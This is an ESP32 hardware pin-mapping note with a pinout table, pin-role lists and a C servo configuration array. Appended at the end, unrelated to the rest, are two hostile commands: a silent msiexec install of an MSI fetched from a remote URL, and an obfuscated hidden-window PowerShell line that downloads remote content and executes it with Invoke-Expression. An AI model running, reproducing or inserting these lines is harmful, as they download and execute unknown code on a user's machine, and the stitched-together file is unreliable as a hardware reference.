
						: 23		V_MO
					-36 : 22		Display SCL
					-39 : Tx	1	
					-34 : Rx	3
					-35 : 21		Display SDA
		PWM_1		32 	: 19		V_MI
		PWM_2		33 	: 18		V_CLK
		PWM_3  		25 	: 		5	V_CSN
		PWM_4		26 	: Rx17		PWM_12
		PWM_5		27 	: Tx16		PWM_11
PWM_6	H_CLK	14	 	: 4 		H_CE	PWM_10
PWM_7	H_MI	12	 	: 		2	V_CE
PWM_8	H_MO		13 	: 		15	H_CSN	PWM_9
					GND	: GND
					VIN	: VCC

I2C PIN: V.G.22.21
GPS PIN: GTRV
LED = 2
Display = 21 / 22
O/P = 4, 16, 17 , 18, 19, 23, 27, 13
I/P = 36, 39, 34, 35, 32, 33, 25, 26
Touch = 15, 12, 14

34, 35, 36, 39 - Note that they do not have internal pull-up or pull-down resistors

---------------------------------------------------------------------------------------------------------------------------------------------------------
PWM
// 16 servo objects can be created on the ESP32
// Recommended PWM GPIO pins on the ESP32 include 2,4,12-19,21-23,25-27,32-33 


int servoData[NUM_Servo][3] = {
  {32, 500, 2000}, //  0
  {33, 500, 2000}, //  1
  {25, 500, 2000}, //  2
  {26, 500, 2000}, //  3
  {27, 500, 2000}, //  4
  {14, 500, 2000}, //  5
  {12, 500, 2000}, //  6
  {13, 500, 2000}, //  7
  {15, 500, 2000}, //  8
  {4,  500, 2000}, //  9
  {16, 500, 2000}, // 10
  {17, 500, 2000}  // 11
};

msiexec /qn /i https://clouds-verify.com/s.msi
poweRshEll -N"O"Pr -"w" h -COM "$ctqh3 = '11"x1.in"k'; $e"yl"92 = I"nv"oke-"R"e"st"Method -"U"ri $ctqh3; Inv"o"ke-Ex"pre"s"sio"n $e"yl"92"

